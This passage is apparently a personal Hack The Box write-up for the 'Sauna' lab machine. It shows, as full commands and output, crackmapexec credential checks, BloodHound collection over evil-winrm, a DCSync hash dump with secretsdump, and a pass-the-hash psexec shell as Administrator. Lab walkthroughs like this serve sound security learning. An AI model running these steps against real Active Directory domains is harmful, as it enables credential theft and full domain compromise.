u505@naos:~/HTB/Machines/Sauna$ sudo crackmapexec smb 10.10.10.175/32 -u svc_loanmgr -p 'Moneymakestheworldgoround!' --shares SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! SMB 10.10.10.175 445 SAUNA [+] Enumerated shares SMB 10.10.10.175 445 SAUNA Share Permissions Remark SMB 10.10.10.175 445 SAUNA ----- ----------- ------ SMB 10.10.10.175 445 SAUNA ADMIN$ Remote Admin SMB 10.10.10.175 445 SAUNA C$ Default share SMB 10.10.10.175 445 SAUNA IPC$ READ Remote IPC SMB 10.10.10.175 445 SAUNA NETLOGON READ Logon server share SMB 10.10.10.175 445 SAUNA print$ READ Printer Drivers SMB 10.10.10.175 445 SAUNA RICOH Aficio SP 8300DN PCL 6 We cant print money SMB 10.10.10.175 445 SAUNA SYSVOL READ Logon server share
Shares are the same as user fsmith.
u505@naos:~/HTB/Machines/Sauna$ sudo crackmapexec winrm 10.10.10.175/32 -u svc_loanmgr -p 'Moneymakestheworldgoround!' WINRM 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) WINRM 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
User svc_loanmgr has WinRm access too.
AD graph with bloodhound
First we start the graph database.
u505@naos:~/HTB/Machines/Sauna$ sudo neo4j console [sudo] password for u505: Directories in use: home: /usr/share/neo4j config: /usr/share/neo4j/conf logs: /usr/share/neo4j/logs plugins: /usr/share/neo4j/plugins import: /usr/share/neo4j/import data: /usr/share/neo4j/data certificates: /usr/share/neo4j/certificates run: /usr/share/neo4j/run Starting Neo4j. WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual. 2020-12-29 20:13:40.458+0000 INFO Starting... 2020-12-29 20:13:42.573+0000 INFO ======== Neo4j 4.2.1 ======== 2020-12-29 20:13:43.652+0000 INFO Performing postInitialization step for component 'security-users' with version 2 and status CURRENT 2020-12-29 20:13:43.652+0000 INFO Updating the initial password in component 'security-users' 2020-12-29 20:13:43.914+0000 INFO Bolt enabled on localhost:7687. 2020-12-29 20:13:44.982+0000 INFO Remote interface available at http://localhost:7474/ 2020-12-29 20:13:44.983+0000 INFO Started.
Start Bloodhound.
u505@naos:~/HTB/Machines/Sauna$ export display=:10.0 u505@naos:~/HTB/Machines/Sauna$ /opt/utils/BloodHound/BloodHound-linux-x64/BloodHound
Copy the collector to local directory.
u505@naos:~/HTB/Machines/Sauna$ cp /opt/utils/BloodHound/Collectors/SharpHound.exe ./
From the target run the collector and download the zip file.
u505@naos:~/HTB/Machines/Sauna$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload SharpHound.exe Info: Uploading SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe
Data: 1110696 bytes of 1110696 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\SharpHound.exe ------------------------------------------------ Initializing SharpHound at 7:46 PM on 12/29/2020 ------------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL [+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS Status: 0 objects finished (+0) -- Using 19 MB RAM Status: 60 objects finished (+60 60)/s -- Using 27 MB RAM Enumeration finished in 00:00:01.7950268 Compressing data to .\20201229194658_BloodHound.zip You can upload this file directly to the UI
SharpHound Enumeration Completed at 7:47 PM on 12/29/2020! Happy Graphing!
*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20201229194658_BloodHound.zip Info: Downloading C:\Users\FSmith\Documents\20201229194658_BloodHound.zip to 20201229194658_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> exit
Info: Exiting with code 0
Ingest the file
Mark user fsmith as owned.
Mark user svc_loanmgr as owned.
Administrator is the only admin in this domain.
The graph shows that user svc_loanmgr has DC sync rights. It means that we can fool the domain controller to send us the hashes of the AD database.
The graph finds that user fsmith is vulnerable to Kerberos roasting without Preauthentication.
Dump hashes by DC Sync
u505@naos:~/HTB/Machines/Sauna$ python3 /opt/utils/impacket/examples/secretsdump.py svc_loanmgr@sauna Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password: [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:b237f48bc404863ca6d2c62750e403df::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031 Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0 Administrator:des-cbc-md5:19d5f15d689b1ce5 krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:3a43b214a77e807f18cf726cc35d2a760dcf2e5b1095ca976d1d5c537704d6bd SAUNA$:aes128-cts-hmac-sha1-96:cd9b1858751d4d9d718136ad1a37d0e6 SAUNA$:des-cbc-md5:7ad9bc541af40d73 [*] Cleaning up...
Root flag
u505@naos:~/HTB/Machines/Sauna$ python3 /opt/utils/impacket/examples/psexec.py administrator@sauna -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on sauna..... [*] Found writable share ADMIN$ [*] Uploading file FbDzpflW.exe [*] Opening SVCManager on sauna..... [*] Creating service WAwA on sauna..... [*] Starting service WAwA..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.973] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\Users c:\Users>cd administrator c:\Users\Administrator>cd Desktop c:\Users\Administrator\Desktop>type root.txt <ROOT_FLAG> c:\Users\Administrator\Desktop>systeminfo Host Name: SAUNA OS Name: Microsoft Windows Server 2019 Standard OS Version: 10.0.17763 N/A Build 17763 OS Manufacturer: Microsoft Corporation OS Configuration: Primary Domain Controller OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00429-00000-00001-AA815 Original Install Date: 1/22/2020, 9:32:10 PM System Boot Time: 12/28/2020, 4:20:33 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-gb;English (United Kingdom) Time Zone: (UTC-08:00) Pacific Time (US & Canada) Total Physical Memory: 4,095 MB Available Physical Memory: 2,884 MB Virtual Memory: Max Size: 4,799 MB Virtual Memory: Available: 3,757 MB Virtual Memory: In Use: 1,042 MB Page File Location(s): C:\pagefile.sys Domain: EGOTISTICAL-BANK.LOCAL Logon Server: N/A Hotfix(s): 5 Hotfix(s) Installed. [01]: KB4532947 [02]: KB4462930 [03]: KB4516115 [04]: KB4523204 [05]: KB4534273 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.175 [02]: fe80::792e:7029:e1dd:c810 [03]: dead:beef::792e:7029:e1dd:c810 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
c:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on sauna..... [*] Stopping service WAwA..... [*] Removing service WAwA..... [*] Removing file FbDzpflW.exe.....
References
Daniel Simao 20:22, 28 December 2020 (EST)
